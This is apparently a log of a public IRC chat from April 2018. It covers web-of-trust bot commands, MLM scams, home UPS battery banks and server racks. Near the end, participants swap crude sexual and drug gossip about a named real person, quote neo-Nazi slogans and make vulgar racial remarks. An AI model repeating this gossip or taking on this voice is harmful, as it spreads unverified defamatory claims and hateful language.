trust are separate matters 1803680;1524242837;mircea_popescu;lol you hear that danielpbarron ? randos coming in to eat your luncvh, better hurry up. 1803681;1524242852;mircea_popescu;ckang, what do you mean, epoch ? 1803682;1524242868;mircea_popescu;!!key pinochle 1803683;1524242870;deedbot;http://wot.deedbot.org/685BD2BF73D2096B8DBDA3754EE147269B5763CA.asc 1803684;1524242878;mircea_popescu;!!rate pinochle 1 noob. 1803685;1524242881;deedbot;Get your OTP: http://p.bvulpes.com/pastes/1RsfL/?raw=true 1803686;1524242886;ckang;the start 1803687;1524242894;mircea_popescu;ckang, you mean, day one ? 1803688;1524242897;ckang;yea 1803689;1524242927;ckang;or if there is, im failing at finding it on the page 1803690;1524243106;pinochle;BingoBoingo: other history: in the past I was a trader, predominantly futures. studied probability, my work now mainly consists of constructing prediction models 1803691;1524243175;mircea_popescu;there's two day ones : there's day one of #trilema... un check it out, dragon went away huh ?precipitated by http://btcbase.org/log/2016-03-28#1440673 ; then there's the day 1 of #bitcoin-assets, http://btcbase.org/log/2012-04-15 (precipitated by http://trilema.com/2014/a-little-bit-of-bitcoin-history/ ). it was #bitcoin-otc before that, but by now we're going way too far into the embryonic life of a yet entirely undistinguis 1803692;1524243175;a111;Logged on 2016-03-28 13:11 mircea_popescu: upon consideration, i see no reason to continue supporting or otherwise encourage kakobrekla's bizarre worldview. on the contrary, i view further involvement with the nonsense as considerable moral hazard, and a miserable thing to do altogether. 1803693;1524243175;mircea_popescu;hable item-to-be 1803694;1524243191;mircea_popescu;pinochle, but you're not herbi are you ? 1803695;1524243213;mircea_popescu;!!up pinochle 1803696;1524243213;deedbot;pinochle voiced for 30 minutes. 1803697;1524243307;pinochle;is herbi a person? if so, no 1803698;1524243340;mircea_popescu;herbijudlestoids, similar professional interests. 1803699;1524243341;ben_vulpes;guy who lost his key and shirt 1803700;1524243356;mircea_popescu;ben_vulpes, you might be thinking of yet another one ? 1803701;1524243372;ben_vulpes;mircea_popescu: didn't he lose the market-making game against BingoBoingo ? 1803702;1524243382;mircea_popescu;wasn't that bugpowder ? 1803703;1524243385;ben_vulpes;on atc 1803704;1524243390;mircea_popescu;hm\ 1803705;1524243390;ben_vulpes;nono surely not bugpowder 1803706;1524243408;mircea_popescu;you might be right, my memory's fuzzing out at the edges. 1803707;1524243429;ben_vulpes;DEATH COMES FOR US ALL 1803708;1524243432;mircea_popescu;lol 1803709;1524243436;mircea_popescu;did you ever play that ? 1803710;1524243449;mircea_popescu;(it's DEATH COMES FOR YOU ALL!!! in the original) 1803711;1524243480;ben_vulpes;diablo or what 1803712;1524243490;mircea_popescu;baldur's gate. the little crazed dwarf. 1803713;1524243513;ben_vulpes;oh shit yeah 1803714;1524243523;ben_vulpes;i tried to get that running recently; never finished that game 1803715;1524243550;ben_vulpes;i also lost interest because its not a text interface to eulora so why bother kill yourself instead 1803716;1524243551;mircea_popescu;and since we're doing this : there's also FOR THE CLANS!!! from "disciples", an ancient but really great game ; and WANT SOME, GET SOME! from a very popular set of browser tower defenses. 1803717;1524243691;mircea_popescu;diablo is, of course, "the gates of asheron..." 1803718;1524243717;mircea_popescu;https://www.youtube.com/watch?v=Sd9McnrxVn4 1803719;1524243737;mircea_popescu;though act 2 interule is probably the best part. 1803720;1524244143;mircea_popescu;meanwhile http://trilema.com/2014/ill-pay-for-your-tits/ updated with closing statement. 1803721;1524244457;ben_vulpes;so i was over at a friends place yesterday and he showed me this "cloud cryptocurrency trading bot" (actually a barely-sentient js algo trading browserapp); best lols of which were a "reset profit/loss 1803722;1524244481;mircea_popescu;eheheh 1803723;1524244485;ben_vulpes;" button because "i didn't get it right before, i'll make money this time", and also i shit thee not a panic sell-everything button 1803724;1524244505;mircea_popescu;how's that bit from psychology of bagholder, "succeeds at feeling like a trader, whioch was the point" ? 1803725;1524244516;ben_vulpes;definitely not targeting problem gamblers and people who want to feel like traders 1803726;1524244520;mircea_popescu;dude succeeds at feeling like a trade bot programmer. the reset is integral. 1803727;1524244540;ben_vulpes;thing comes complete with etoro preprogrammed bots 1803728;1524244543;mircea_popescu;all he wants are some good vacation snaps, "remember that time in april 2015" 1803729;1524244549;mircea_popescu;butofcourse. 1803730;1524244559;ben_vulpes;"hey man how are you?" "oh just losing my dick in crypto" 1803731;1524244568;ben_vulpes;youdontfuckingsay.png 1803732;1524244577;mircea_popescu;and the lulzuy thing is, ETORO DIDNT EVEN HAVE TO PAY FOR THIS. 1803733;1524244587;mircea_popescu;they support the inca because they want to, not for any other reason. 1803734;1524244603;ben_vulpes;well etoro in the abstract, they have their own hilarious marketplace of preprogrammed bots 1803735;1524244608;mircea_popescu;yup. 1803736;1524244638;ben_vulpes;ohoh also you can subscribe to "trading signals" for x bucks per month (starts at free, goes clear up to the hundreds) and plug them into the bots 1803737;1524244644;ben_vulpes;i cannot even fathom 1803738;1524244660;mircea_popescu;ben_vulpes, see, very much the http://btcbase.org/log/2018-04-20#1803632 1803739;1524244660;a111;Logged on 2018-04-20 05:05 mircea_popescu: the "5k user discord server" is not substantially different from a piece of paper on which you wrote the number 5 followed by the letter k, or for that matter paul graham's yahoo scam ( http://trilema.com/2015/investigations-in-the-bone-heap-of-the-lost-generation-today-mashable/#footnote_6_59020 / http://trilema.com/2014/the-psychology-of-the-bagholder/#selection-117.0-117.539 ). 1803740;1524244680;mircea_popescu;in point of fact it's a thing to admire and wonder at, the incredibly refined fucktools these people built. 1803741;1524244697;mircea_popescu;the empire may not be much for anything, but THIS, "how to fuck your own kids", jesus christ this they got down to a fine art. 1803742;1524244699;ben_vulpes;also hey, we've got a datacenter, who's going to write the backpage replacement 1803743;1524244712;mircea_popescu;ben_vulpes, the who ? 1803744;1524244763;ben_vulpes;online personals site got taken down couple weeks back for facilitating child sex slavery and tax evasion and the usual list of pantsuit crimes du jour 1803745;1524244794;mircea_popescu;either because of that, or because no real money into it. 1803746;1524244820;mircea_popescu;sv item, it hoped to bambozle "investors". without note from stalin affirming their correct rosy color of bits, there's no free fed money. 1803747;1524244853;ben_vulpes;as i understand the story it was more of a craigslist, organically grown to profitability on very few staff and run in steady state for years 1803748;1524245049;mircea_popescu;that is a prospectus lie. 1803749;1524245092;mircea_popescu;ben_vulpes, anyway, in particular the veblen goods of "subscribe to information" is one of the lulziest applications of the whole new-world-protestants-in-skinner-box lulz. 1803750;1524245117;mircea_popescu;i recently mentioned some schmuck that had broken new ground in the field, before turning to dope and there was some stuff with kids and brothers and the usual redneckisms. 1803751;1524245120;mircea_popescu;wtf was his name 1803752;1524245273;mircea_popescu;phf, how do i exclude terms in search ? 1803753;1524245327;mircea_popescu;http://btcbase.org/log/2018-04-03#1792243 <<< theere we go. david wood, empower network. 1803754;1524245327;a111;Logged on 2018-04-03 06:01 mircea_popescu: and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/ 1803755;1524245407;mircea_popescu;so check out this dood's idea : he figured out (correctly) that the mistake every other utahian/scammer in the mlm / online sales&marketing field makes is, chiseling the pennies. this prevents their growth. so instead of forcing people to buy $50 worth of thin air and keeping 35 out of it, to be distributed in astonishingly pained and complicated ways, 1803756;1524245445;mircea_popescu;he gave 100% rebates. sell $5000 "worth of" imaginary (but "very valuable") "products" of an absent "industry", get $5000 of the sale back as commission! 1803757;1524245481;mircea_popescu;by this strike of genius, you can now be left with the impression that you're in business, selling things. to yourself -- which is the fucking point, all the imperial scams work by your selling things to yourself, from facebook to "rule of law". 1803758;1524245543;mircea_popescu;and the company shows a great balance sheet, also! a trillion in sales!!! fastest growing (see ? FASTEST GROWING ? yes ? http://btcbase.org/log/2018-04-20#1803460 ?) company online! "makes" very close to what it "spends"! GREAT INVESTMENT! 1803759;1524245543;a111;Logged on 2018-04-20 02:39 mircea_popescu: understand how the empire of idiots' euphemism threadmill works : they noticed that you go by the heuristic of "published holes", and they've adapted to that (because that's what the idiots are all about, "Exam taking", ie optimizing for the measurement not for the variable measured). so, they keep publishing strainers and calanders, except the sort where YOU don't know the holes. it gives you the warm fuzzy feeling that "The 1803760;1524245601;mircea_popescu;basically it's an extension of the groupon scam (hey, anyone "excited" by the "perspectives" of usg's "business" and "entrepreneuriat" ever think of groupon anymore ? that whole hype bubble of "global warming" / "ozon depletion" whatever popped and... ??? ) 1803761;1524245617;mircea_popescu;and it was, too, for a few years before the dood cracked and went on the pipe it was hot stuff. 1803762;1524245739;mircea_popescu;the inescapable fact that in the bubble of insanity resting atop fed's imaginary money a company that spends a trillion to make a trillion is in fact an EXCEPTIONALLY GOOD investment (and google is NOTHING ELSE than this, to be clear, nor are any of the rest of them) will result in the necessary evolution where "here, i've made an imaginary company that trades a trillion with "real people". problem ? 1803763;1524245818;mircea_popescu;then they're stuck communicating what should have been fucking communicated by the workings of money in the economy through other channels. "backpage is color sextraficking and that "very exciting genetic blabla" company is color doubleplusungood and so fucking on. there's no more useless, stupid and soon to be bankrupt, because http://trilema.com/2014/the-problem-of-ideal-social-systems-reprint/ 1803764;1524245835;mircea_popescu;build an ideal social system, lose language. or rather -- language dragontails the shit out of your nonsense. 1803765;1524246117;BingoBoingo; wasn't that bugpowder ? << It was herbi, bugpowder was gone by then. unless herbi was a tulpa of bugpowder 1803766;1524246130;mircea_popescu;nah, dun think so. 1803767;1524246200;mircea_popescu;also, to belabour the point : anyone who thinks "oh, that guy, really, cure hiv and diabethes ? he must have lost it". NO HE DID NOT ; you understood nothing of the logreading you did so far! think about it : this dood had built self "a brand", ie, there were however many useless muppets who knew who he was / kept track / had him in their rss feed / he had them in his mailing list. this was t0. 1803768;1524246217;mircea_popescu;then at t1 the item went through some phenomena that'd have repelled all thinking individuals. 1803769;1524246249;mircea_popescu;finally coming out of the massive bender at t2, the dude WOULD STILL LIKE TO EAT. how would you eat if you were him ? would you give up, do something else with your time ? he doesn't give up. he's fucking dedicated. 1803770;1524246279;mircea_popescu;what he does is observe that out of his 10mn or w/e list, 9.999 million were culled off in t1. fine. WHATEVER!!!. there's still 10`000 left yes ? what do we know about them ? 1803771;1524246294;mircea_popescu;that they're the sort of fucktard who WASNT CULLED, yes ? they "stuck with him", yes ? 1803772;1524246302;mircea_popescu;who better to sell hiv-diabethes cures to, then ? 1803773;1524246311;mircea_popescu;~that~ part is perfectly sensible. 1803774;1524247016;*;asciilifeform finally swapped the ups batteries 1803775;1524247027;asciilifeform;attn folx : node zoolag is back in service 1803776;1524247047;asciilifeform;!!unrate ascii_lander 1803777;1524247050;deedbot;Get your OTP: http://p.bvulpes.com/pastes/zN18k/?raw=true 1803778;1524247066;asciilifeform;!!v FB25F7DF71FB3EDCF96836C31C0DBDB9E14A6F3DAC4A46434ACC83C766BA0936 1803779;1524247066;deedbot;asciilifeform unrated ascii_lander. 1803780;1524247564;asciilifeform;55.6V << notbad 1803781;1524247580;asciilifeform;apparently these things dun rot on the shelf as fast as i thought 1803782;1524247767;ckang;volts? kind of an odd #, telco ? 1803783;1524247778;asciilifeform;ckang: nominally 48 1803784;1524247790;ckang;yea 48 is the only thing i could think of close 1803785;1524247796;asciilifeform;and yes it's an industrial ups, 'liebert' 1803786;1524247801;ckang;maybe european telco :) 1803787;1524247870;ckang;ive been wanting to spin my own UPS/BMS 1803788;1524247913;ckang;or find a bring your own battery solution but didnt find much available last time i looked 1803789;1524247970;mircea_popescu;ckang, build your own, out of car/truck batteries. 1803790;1524247995;mircea_popescu;they generally can be found very cheap, with a lot of life left in them (that it useful to you, in a 500 item arrangement, but not to the single-item cars) 1803791;1524248023;ckang;yea thats what I was planning on 1803792;1524248038;ckang;reconditioning some old cores 1803793;1524248084;asciilifeform;bah truck battery hates deepcycle 1803794;1524248093;*;asciilifeform had just such a contraption for some years 1803795;1524248135;BingoBoingo;ckang: If your wattage needs aren't incredible you could always go the smoke detector RTG route 1803796;1524248147;ckang;i could probably even re-use a solar panel BMS system and a decent PSU, charging rate isn't super critical or often 1803797;1524248163;ckang;not familiar with that one 1803798;1524248303;ckang;got me, what is 'smoke detector RTG route' 1803799;1524248322;ckang;not finding much 1803800;1524248347;BingoBoingo;ckang: You take a source of radioactive decay and hook a thermocouple up to it. Smoke detector means you harvest the emiters from the smoke detectors for your decay source. 1803801;1524248429;BingoBoingo;Similar things are used to power light houses, radio beacons, and space probes 1803802;1524248480;ckang;whats this used for? im thinking more of a digital solution 1803803;1524248555;BingoBoingo;ckang: Things like http://bellona.org/news/nuclear-issues/radioactive-waste-and-spent-nuclear-fuel/2003-11-two-strontium-powered-lighthouses-vandalised-on-the-kola-peninsula 1803804;1524248593;BingoBoingo;It is as maintenance free as such a thing can be 1803805;1524248675;ckang;ohhhhhhhh 1803806;1524248681;ckang;power source 1803807;1524248805;ckang;i feel like trying to buy something like that would bring all sorts of 3 letter agencies to my place 1803808;1524248992;asciilifeform;lol BingoBoingo , world's most expensive power source 1803809;1524249027;mircea_popescu;asciilifeform, you don't deepcycle it. that's why you pile a lot of them. 1803810;1524249056;asciilifeform;mircea_popescu: sit long enuff without mains current, and you get deepcycle 1803811;1524249070;asciilifeform;unless ( like e.g. castle mircea_popescustein ) you have diesel backup 1803812;1524249073;mircea_popescu;yes, well, different usecase. 1803813;1524249091;asciilifeform;typically 'large pile' is for moar wattage 1803814;1524249105;asciilifeform;and expectation is that diesel takes over in 3-5min , however long it takes to crank 1803815;1524249161;*;asciilifeform does not currently have diesel, but also ~never gets outage of moar than 1hr or so; hence has large pile of cells 1803816;1524249174;BingoBoingo;ckang: You could always get your own turbine and go off the grid if you prefer something different. Turbine isn't picky about fuels. 1803817;1524249213;mircea_popescu;the numbers are worth the mention : if you get 500 old truck/high power car batteries, literally, and you put them in 4 lines (gets about 49 - 50V or so), you now have somewhere in the range of 500 * AT LEAST 50 Ah in your hands. that's 25 KWh for the more common measure. 1803818;1524249235;mircea_popescu;takes a while to eat that much ; but yes, if your power outages are days rather than hours, this needs a generator system associated. 1803819;1524249325;mircea_popescu;ckang, "rtg" is how soviets used to power their satellites. put a chunk of cesium or plutonium next to some electric contacts. 1803820;1524249336;asciilifeform;storage for 500 old batteries ( esp of the normal truck type, that vents H2 ) ain't free 1803821;1524249350;mircea_popescu;asciilifeform, depends where you live :D but yes. 1803822;1524249361;asciilifeform;in mircea_popescustan -- ~free, put'em in a shed, aha 1803823;1524249369;mircea_popescu;quite. up on this hill, with the winds... 1803824;1524249391;mircea_popescu;airtight would be expensive. well aerated, that's easy. 1803825;1524249394;asciilifeform;i expect corrosion is a bitch in mircea_popescustan tho 1803826;1524249409;mircea_popescu;much less a problem than in wash dc sprintime. 1803827;1524249415;mircea_popescu;springtime*. 1803828;1524249419;mircea_popescu;it's not THAT wet, really. 1803829;1524249485;ckang;i think for most of my stuff, i would like a staged UPS that could power off the least important stuff first (tied to mains, monitors, speakers) then allow enough time for shutdown of other things (possibly using shunts to measure load) and let maybe 1 server stay up and networking gear 1803830;1524249494;asciilifeform;mircea_popescu: it wasn't 'some contacts', seebek-style bimetallic generator is terrible ; typically they had peltier pile 1803831;1524249499;mircea_popescu;anyway. at least here the 500 could be had for under 10k. which is VERY reasonable considering what "professional" solutions cost ; and how their performance stacks up. 1803832;1524249510;asciilifeform;( you're prolly thinking of the seebek generator with kerosene wick from 1950s ) 1803833;1524249525;mircea_popescu;asciilifeform, i was BEING DERROGATORY ok 1803834;1524249531;asciilifeform;lol 1803835;1524249556;asciilifeform;after yrs of grunting with handmade ups, i found the magic pill -- surplus industrial ones 1803836;1524249570;mircea_popescu;that also works. in asciilifeformlands, ~free. 1803837;1524249579;asciilifeform;and turns out not simply pretentious rubbish, they have useful knobs ( to gauge decay , overvoltage, line noise, etc ) 1803838;1524249580;asciilifeform;aha 1803839;1524249602;asciilifeform;in monkeystan, can't even be had for money, i expect. not without commissioning d00ds with suitcases 1803840;1524249612;mircea_popescu;quite. 1803841;1524249636;BingoBoingo;In other news, asciilifeform left me here with an ice cream habit. I not thought to invesitgate the local ice cream scene in depth until mircea_popescu mentioned it is the necessary accompaniment to long walks. Last night I consumed 1/4 kilo of bananasplit. 1803842;1524249645;ckang;asciilifeform: what did yo end up with for the BMS? 1803843;1524249647;ckang;you* 1803844;1524249660;asciilifeform;ckang: waiwat 1803845;1524249667;BingoBoingo; in monkeystan, can't even be had for money, i expect. not without commissioning d00ds with suitcases << THe pizarro rack is already likely the hightest concentration of RAM in this orcistan 1803846;1524249697;asciilifeform;speaking of which, douchebag , mod6 , ( others ? ) did ben_vulpes give you working keys yet ? 1803847;1524249716;asciilifeform;i delegated the handing-out of box keys to ben_vulpes , he wanted to keep track of ips/people 1803848;1524249728;ben_vulpes;i got douchebag his creds 1803849;1524249733;asciilifeform;ok good 1803850;1524249754;ben_vulpes;mod6: wanted one as well? 1803851;1524249791;asciilifeform;he did say, several times. ping him when he wakes up. 1803852;1524249811;asciilifeform;i dun recall who else wanted; several folx iirc threatened to buy 1803853;1524249827;asciilifeform;ACHTUNG panzers! 4 rockboxen left!11 1803854;1524249892;ckang;mircea_popescu: btw, its #templeos-irc now on rizon, he popped in earlier: 1803855;1524249899;ckang;https://www.irccloud.com/pastebin/u3NYfE78/ 1803856;1524250045;asciilifeform;i'ma do a proper photoreportage re the expedition , but summary is : 100% of iron delivered in working order 1803857;1524250055;asciilifeform;( all ~100kg of it ) 1803858;1524250105;asciilifeform;at a total cost of ~2k ( i'ma do a proper rundown tomorrow ) usd. 1803859;1524250169;asciilifeform;delivered, moorings hammered back into shape , enracked, (where applicable) en-disked, en-os'd, powered, sshkeyed, tested. 1803860;1524250239;asciilifeform;also obtained and set up a 2nd GB switch in rack; and a 220v mains distributor; and a ip kvm ( which annoyingly requires... java on the remote control end, but 'with torch in daylight' to this very day i cannot find ANY ipkvm that does not commit this type of warcrime ) 1803861;1524250267;asciilifeform;if anyone needs the kvm, plz page BingoBoingo to plug it in, and asciilifeform to show how to connect to it 1803862;1524250285;asciilifeform;note that rockchip boxen cannot use the kvm, they have no kbd or display 1803863;1524250376;mircea_popescu;BingoBoingo, earlier, i put a slab of frozen mango jam with some ground ice and a frozen banana in the blender. the resulting slush was duly dolloped in expectant cups. we moved to the balcony and for a little all could be heard was spoons scraping on cup, but then "how long since you showered ?" "umm... yesterday ?" *splat* 1803864;1524250392;mircea_popescu;you have any idea how satisfying it is to splat gelato on tits and things ? VERY! 1803865;1524250420;ckang;there is not a single decent kvm i have ever had the pleasure of using 1803866;1524250424;trinque;ey ben_vulpes apparently terry davis is wandering the streets of portland. 1803867;1524250430;BingoBoingo;mircea_popescu: Will have to try that one. 1803868;1524250439;mircea_popescu;indedeed. 1803869;1524250450;mircea_popescu;trinque, o really ? hey ben_vulpes mind doing a mitzvah ? 1803870;1524250455;ben_vulpes;trinque: you know i'm going to go hang out with a favorite ex next week, maybe i'll try to rope him in for a gangbang 1803871;1524250457;BingoBoingo;No hay mangos frescos acá, pero hay duraznos. 1803872;1524250470;trinque;ben_vulpes: charitable! 1803873;1524250471;mircea_popescu;whatever you hay will hafta haye. 1803874;1524250473;ckang;mircea_popescu: see my pastebin 1803875;1524250483;mircea_popescu;1sec 1803876;1524250483;ckang;he popped in today 1803877;1524250513;ckang;about 2hrs ago 1803878;1524250527;BingoBoingo;ckang: Your santanic pastatron offers: " IRCCloud snippets require JavaScript to be displayed. Try viewing the raw version instead. " 1803879;1524250527;ben_vulpes;mircea_popescu: what, bike around in circles looking for the fella? 1803880;1524250553;mircea_popescu;ben_vulpes, well, buy him a steak. 1803881;1524250587;mircea_popescu;1:07 PM 15 minute computer limit a day! << o.O 1803882;1524250593;mircea_popescu;sounds like an institution. 1803883;1524250609;ben_vulpes;possibly multcolib 1803884;1524250610;ckang;https://www.irccloud.com/pastebin/raw/u3NYfE78 1803885;1524250612;phf;search's broken, i'm live coding.. 1803886;1524250687;ben_vulpes;mircea_popescu: i'll email the fella; dinner on you? 1803887;1524250703;mircea_popescu;this guy 1803888;1524250730;ben_vulpes;i am but a poor webdev who ate too much btc last month 1803889;1524250777;ben_vulpes;actually i know just the place 1803890;1524250778;mircea_popescu;i'll put a coupla bitcents towards it, how about that. 1803891;1524250810;ben_vulpes;not the most *marvelous* steaks, but... http://acropolispdx.com/ 1803892;1524250811;phf;so i still haven't added a proper general purpose search grammar, but right now you can do e.g. 1803893;1524250814;ben_vulpes;i wonder if he'll object 1803894;1524250818;phf;!#s from:phf "http" 1803895;1524250818;a111;1443 results for "from:phf \"http\"", http://btcbase.org/log-search?q=from%3Aphf%20%22http%22 1803896;1524250823;BingoBoingo;http://p.bvulpes.com/pastes/A3ie0/?raw=true << The end of that convo >> "1:18 PM shit, this hobo costs me more than a gf" 1803897;1524250823;phf;!#s from:phf "http" not:btcbase 1803898;1524250823;a111;842 results for "from:phf \"http\" not:btcbase", http://btcbase.org/log-search?q=from%3Aphf%20%22http%22%20not%3Abtcbase 1803899;1524250837;ckang;ben_vulpes: hes met people before no problem 1803900;1524250843;phf;mircea_popescu: ^ 1803901;1524250847;ben_vulpes;ckang: well did you click the link though 1803902;1524250872;ckang;oh no 1803903;1524250877;ckang;let me see 1803904;1524250891;mircea_popescu;phf, what other predicates, not and thassit ? 1803905;1524250895;ckang;haha 1803906;1524250918;mircea_popescu;in other lulz, https://www.deseretnews.com/article/900000059/from-mormon-kid-to-alleged-drug-kingpin-inside-the-rise-and-fall-of-aaron-shamo.html 1803907;1524250936;ben_vulpes;i love acrop, it's entirely out of my orbits these days though 1803908;1524250950;hanbot;http://logs.bvulpes.com/trilema?d=2018-4-20#341046 << this seemed a particularly choice bit of variety speak, if for correctness of fit rather than arcaneness. 1803909;1524250952;mimisbrunnr;Logged on 2018-04-20 17:14 mircea_popescu: ben_vulpes, anyway, in particular the veblen goods of "subscribe to information" is one of the lulziest applications of the whole new-world-protestants-in-skinner-box lulz. 1803910;1524250997;asciilifeform;for impatient people : http://loper-os.org/pub/dc_cat.jpg , http://www.loper-os.org/pub/bb_v.jpg , http://www.loper-os.org/pub/rockchip1.jpg , http://www.loper-os.org/pub/rockchip2.jpg << highlights 1803911;1524250999;mircea_popescu;hanbot, hey, that's what a good variety speak is for, fit more in head. 1803912;1524251029;phf;mircea_popescu: notfrom, and it's not proper grammar. the whole thing is an AND, and the foo:... commands are constraints. so not is more properly should be called something like "filter:" 1803913;1524251033;mircea_popescu;ben_vulpes, i don't get it, why is there a girl's leg under the email box, are they trying to say they've got sluts or what 1803914;1524251041;ben_vulpes;a+ porno asciilifeform 1803915;1524251046;mircea_popescu;phf, aok 1803916;1524251047;ben_vulpes;mircea_popescu: 'tis a strip joint 1803917;1524251058;asciilifeform;ben_vulpes: there's like 500 pics, these are the ones people iirc specifically asked for 1803918;1524251059;mircea_popescu;terrible site omfg. 1803919;1524251066;douchebag;lol 1803920;1524251069;ben_vulpes;amazing company! 1803921;1524251091;phf;i will at some point rewrite it to be a more proper (NOT from:ascii) AND beedog OR ... etc. with implicit clauses.. 1803922;1524251107;ckang;supermicro? 1803923;1524251137;asciilifeform;ckang: the box types were discussed to death in #pizarro, they are not seekrit 1803924;1524251169;asciilifeform;the subj of photo is the rockchip holder tho. 1803925;1524251195;phf;but right now it's very easy to add foo:... clause. the complete set of these is from:, notfrom:, refs: (specific number of references that the post has), and not: 1803926;1524251242;phf;!#s from:ascii refs:5 not:achtung "http" 1803927;1524251242;a111;2 results for "from:ascii refs:5 not:achtung \"http\"", http://btcbase.org/log-search?q=from%3Aascii%20refs%3A5%20not%3Aachtung%20%22http%22 1803928;1524251280;ckang;https://usercontent.irccloud-cdn.com/file/nPznrm6m/SM.JPG 1803929;1524251298;asciilifeform;ckang: yours ? 1803930;1524251313;ckang;yea 1803931;1524251316;mircea_popescu;phf, cool ty! 1803932;1524251337;ckang;have 2x 1u a 2u and the 4 1803933;1524251337;asciilifeform;ckang: where do you rack'em ? 1803934;1524251343;mircea_popescu;phf, possibly add a line somewhere in there, maybe as a tooltip ? so i don't ping you again in six months lol 1803935;1524251356;phf;yeah, will do 1803936;1524251359;mircea_popescu;asciilifeform, rack@home 1803937;1524251367;ckang;oh nowhere, just home/file stuff 1803938;1524251377;asciilifeform;aaa errybody got some of those yea 1803939;1524251381;phf;i need to document all the different hidden features, e.g. http://btcbase.org/log/?nick=mircea&inline=true 1803940;1524251409;asciilifeform;oh this is pretty neat pheeby 1803941;1524251410;asciilifeform;phf, 1803942;1524251412;asciilifeform;grrr 1803943;1524251430;mircea_popescu;lol 1803944;1524251438;*;asciilifeform really gotta do sumnthing about this mispheature 1803945;1524251476;phf;i normally read btcbase with nick=phf, but it's not been "announced" because back&forward arrows don't preserve the parameters, something i've been meaning to add for a while now 1803946;1524251548;mircea_popescu;i do about the same thing, i'm grayed out. 1803947;1524251585;mircea_popescu;i credit it with a not-negligible chunk of efficiency-above-average. after all, i know what i fucking said. and if i don't, well, that's a major signal on its own. 1803948;1524252012;asciilifeform;and , meanwhile, speaking of heathens reaping the fruits of heathen isps, cryptome loox finally dead. 1803949;1524252176;mircea_popescu;aww 1803950;1524252195;mircea_popescu;ftr, i'm not amenable to hosting the asshole. he had plenty of time to register before needing. 1803951;1524252221;asciilifeform;d00d's an unrepentant heathen iirc. 1803952;1524252247;asciilifeform;and i actually suspect that he was eaten some time ago. 1803953;1524252263;mircea_popescu;fuck'em. 1803954;1524252291;mircea_popescu;there's gonna be a what-s-his-name-debian-schmuck common grave for all of them. 1803955;1524252301;asciilifeform;the 'nazi' d00d is also nowhere to be found; ditto 1803956;1524252313;asciilifeform;( tho i betcha his whole www could run quite happily off 1 'rockchip' ) 1803957;1524252319;mircea_popescu;inb4 "cryptome was really a forerunner of ministry of truth" equivalent of "Debian was applestore" 1803958;1524252334;asciilifeform;lol 1803959;1524252352;mircea_popescu;which nazi ? 1803960;1524252363;asciilifeform;weev 1803961;1524252364;BingoBoingo;Anglin/Weev 1803962;1524252389;asciilifeform;or his gurl, for that mattery 1803963;1524252396;ckang;are you looking for him? 1803964;1524252402;mircea_popescu;oh. 1803965;1524252421;mircea_popescu;you mean the dood that was "going to" do something with crypto stocks, and the 1803966;1524252435;mircea_popescu;n was going to do something with whatever forum, and did nothing ? 1803967;1524252438;mircea_popescu;mmmyeah ok. 1803968;1524252440;trinque;dude's perfectly happy in the world he inhabits, playing shock jockey and "building his brand" 1803969;1524252455;asciilifeform;trinque: and getting booted from heathen.dns, lol 1803970;1524252464;ckang;i wonder how his community reacted when his mom came out re: his heritage 1803971;1524252478;mircea_popescu;!#s from:weev 1803972;1524252478;a111;40 results for "from:weev", http://btcbase.org/log-search?q=from%3Aweev 1803973;1524252486;trinque;nobody could ever 1803974;1524252508;ckang;weevlos: 1488 1803975;1524252508;ckang;weevlos: fuck jews 1803976;1524252518;ckang;loool, so funny reading that new, when was it dated? 1803977;1524252520;mircea_popescu;hmm, there was an earlier episode with some sort of "publishing dirt on usg corps and shorting with crypto" unacknowledged F.DERPs rehash. 1803978;1524252525;mircea_popescu;BingoBoingo, you recall this ? was it not in the chan ? 1803979;1524252540;mircea_popescu;ckang, hover over name, it shows the timestamp 1803980;1524252545;ckang;ahh ty 1803981;1524252562;BingoBoingo;mircea_popescu: It was before you went no PMs from strangers, turned into a Trilema post. 1803982;1524252572;mircea_popescu;oh. lessee here 1803983;1524252577;ckang;ahh so just prior to this: http://www.newsweek.com/neo-nazi-andrew-weev-auernheimer-daily-stormer-jewish-descent-768805 1803984;1524252600;asciilifeform;eh, descent, whothefuck cares, it didn't hard herr schicklegruber's work 1803985;1524252608;asciilifeform;just take care to burn them archives, lol 1803986;1524252620;trinque;course he does; he's the white girl sucking black dick 1803987;1524252633;mircea_popescu;http://trilema.com/2013/soft-consensus-aka-fecal-matter/#comment-99073 << lol ancient lulz. "Weev and his lawyers can appeal until their faces turn blue, they will get nowhere. " from the quora "experts" 1803988;1524252637;trinque;"mother/father will be so shocked" 1803989;1524252700;ckang;weev is an actual cuck btw, the true definition 1803990;1524252710;mircea_popescu;BingoBoingo, do you happen to know which ? 1803991;1524252718;ckang;she spilled a bunch of stuff about him 1803992;1524252728;asciilifeform;ckang: as in he pays d00dz to come and fuck his wife while he watches ? or wat 1803993;1524252734;BingoBoingo;mircea_popescu: I'll probe real quick. Need a break from this baking Qntra about black cock 1803994;1524252740;mircea_popescu;lol 1803995;1524252746;ckang;asciilifeform: yea, she said he would watch her get fucked by the neighbor boy 1803996;1524252752;asciilifeform;lol! 1803997;1524252755;ckang;and stick things in his ass for captagon 1803998;1524252758;ckang;(spelling?) 1803999;1524252770;asciilifeform;what's a captagon 1804000;1524252784;ckang;its like some amphetamine mixture 1804001;1524252790;ckang;they smoke in the middle east 1804002;1524252796;trinque;being a meth witch is actually pretty nazi too 1804003;1524252803;asciilifeform;i was about to say! 1804004;1524252809;asciilifeform;such fuhrerbunker 1804005;1524252812;ben_vulpes;pervitan! 1804006;1524252817;asciilifeform;pervitin. 1804007;1524252823;ben_vulpes;ah 1804008;1524252828;ckang;yea theres so much about him that doesn't coincide with his 'beliefs' 1804009;1524252832;mircea_popescu;fenethylline 1804010;1524252838;mircea_popescu;basically, fentanyl in analine :D 1804011;1524252859;asciilifeform;naa that'd be american, not dark-teutonic(tm)(r) 1804012;1524252868;mircea_popescu;a a oki 1804013;1524252875;asciilifeform;(germany did not know fentanyl) 1804014;1524252880;ben_vulpes;had fentanyl one time, would recommend it in case anyone has large amounts of skin abraded off and needs the pain muted for a few hours of wambulance trip 1804015;1524252894;ckang;oh its nowhere like fentanyl though 1804016;1524252903;ckang;its a stim the soldiers smoke 1804017;1524252903;mircea_popescu;(it's not related, fentanyl is opio- this is meth-. i justwent for the pun, see. anal-ine ? ) 1804018;1524252929;ckang;but her words "he would let you stick 4 fingers in his ass for a dose" 1804019;1524252935;asciilifeform;mircea_popescu: synthetic opium, popular in modern northameristan; lethal dose 